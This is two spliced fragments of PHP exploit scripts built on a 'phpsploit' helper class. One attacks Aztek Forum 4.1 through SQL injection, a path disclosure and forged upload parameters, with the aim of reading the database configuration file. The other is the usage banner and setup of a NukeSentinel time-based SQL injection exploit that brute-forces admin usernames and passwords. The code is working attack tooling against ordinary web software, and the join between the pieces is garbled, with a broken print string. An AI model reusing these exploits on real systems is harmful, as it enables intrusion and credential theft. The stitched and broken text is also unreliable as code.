$xpl->proxy($prs); } if (!empty($pra)) { $xpl->proxyauth($pra); } print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit"; print "\nheader> =================================================="; if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) { print "\nsploit> Owner -> " . $matches[1]; } else { die("\nsploit> Exploit failed"); } $owner = $matches[1]; print "\nstatus> Trying to register a new user"; $xpl->cookiejar(1); $xpl->allowredirection(1); $name = "phpsploit" . rand(); $xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on"); print "\nsploit> Login/Password -> {$name}"; print "\nstatus> Trying to get database informations"; $xpl->get($url . "forum.php?fid=XD"); if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) { print "\nsploit> Full Path Disclosure -> " . $matches[1]; } else { print "\nsploit> Failed"; } $wanted = str_replace("forum/load.php", "common/bddconf.php", $matches[1]); if (!empty($wanted)) { $xpl->get($url . "index.php?owner={$owner}&action=profile&_SERVER[email]={$name}%40hotmail.coum&_FILES[upload][tmp_name]={$wanted}&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg"); $xpl->get($url . "index.php?owner={$owner}&choix=3"); if (preg_match("#<IMG src='(.*)' width='([0-9]*)' height='([0-9]*)'>#i", $xpl->getcontent(), $matches)) {
#!/usr/bin/php <?php error_reporting(E_ALL ^ E_NOTICE); if ($argc < 3) { print "\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> [Options]\n Params: -url For example http://victim.com/phpnuke/ \nOptions: -prefix Table prefix (default=nuke)\n -debug Debug mod activated (debug_ns.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n Note: This exploit is based on the server response time\n If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n"; exit(1); } $url = getparam("url", 1); $tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke'; $debug = getparam("debug") != "" ? 1 : 0; $benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000'; $proxy = getparam("proxy"); $proxyauth = getparam("proxyauth"); $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); $xpl->allowredirection(0); $xpl->cookiejar(0); if ($proxy) { $xpl->proxy($proxy); } if ($proxyauth) { $xpl->proxyauth($proxyauth); } if ($debug) { debug(1); } print "\nUsername: "******"\nPassword: "; bruteforce('pwd'); exit(0);